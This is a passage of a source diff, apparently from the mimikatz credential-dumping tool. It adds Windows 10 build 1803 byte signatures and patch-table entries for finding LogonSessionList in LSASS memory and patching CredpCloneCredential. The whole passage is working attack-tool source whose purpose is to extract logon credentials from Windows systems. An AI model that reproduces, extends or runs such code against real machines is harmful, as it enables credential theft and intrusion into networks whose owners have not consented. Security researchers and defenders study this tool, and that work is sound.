 	{KULL_M_WIN_BUILD_10_1507,	{sizeof(PTRN_WN63_CredpCloneCredential),	PTRN_WN63_CredpCloneCredential},	{sizeof(PATC_WN64_CredpCloneCredentialJmpShort),	PATC_WN64_CredpCloneCredentialJmpShort},	{6}},
 	{KULL_M_WIN_BUILD_10_1607,	{sizeof(PTRN_WN10_1607_CredpCloneCredential),	PTRN_WN10_1607_CredpCloneCredential},	{sizeof(PATC_WALL_CredpCloneCredentialJmpShort),	PATC_WALL_CredpCloneCredentialJmpShort},	{7}},
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WN10_1703_CredpCloneCredential),	PTRN_WN10_1703_CredpCloneCredential},	{sizeof(PATC_WALL_CredpCloneCredentialJmpShort),	PATC_WALL_CredpCloneCredentialJmpShort},	{7}},
+	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN10_1803_CredpCloneCredential),	PTRN_WN10_1803_CredpCloneCredential},	{sizeof(PATC_WALL_CredpCloneCredentialJmpShort),	PATC_WALL_CredpCloneCredentialJmpShort},	{7}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WNT5_CredpCloneCredential[]			= {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};

mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c

@@ -12,6 +12,7 @@ BYTE PTRN_WN61_LogonSessionList[]	= {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0
 BYTE PTRN_WN63_LogonSessionList[]	= {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05};
 BYTE PTRN_WN6x_LogonSessionList[]	= {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 BYTE PTRN_WN1703_LogonSessionList[]	= {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
+BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4,   0}},
 	{KULL_M_WIN_BUILD_2K3,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4, -45}},
@@ -21,6 +22,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_WN63_LogonSessionList),	PTRN_WN63_LogonSessionList},	{0, NULL}, {36,  -6}},
 	{KULL_M_WIN_BUILD_10_1507,	{sizeof(PTRN_WN6x_LogonSessionList),	PTRN_WN6x_LogonSessionList},	{0, NULL}, {16,  -4}},
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WN1703_LogonSessionList),	PTRN_WN1703_LogonSessionList},	{0, NULL}, {23,  -4}},
+	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN1803_LogonSessionList),	PTRN_WN1803_LogonSessionList},	{0, NULL}, {23,  -4}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WN51_LogonSessionList[]	= {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};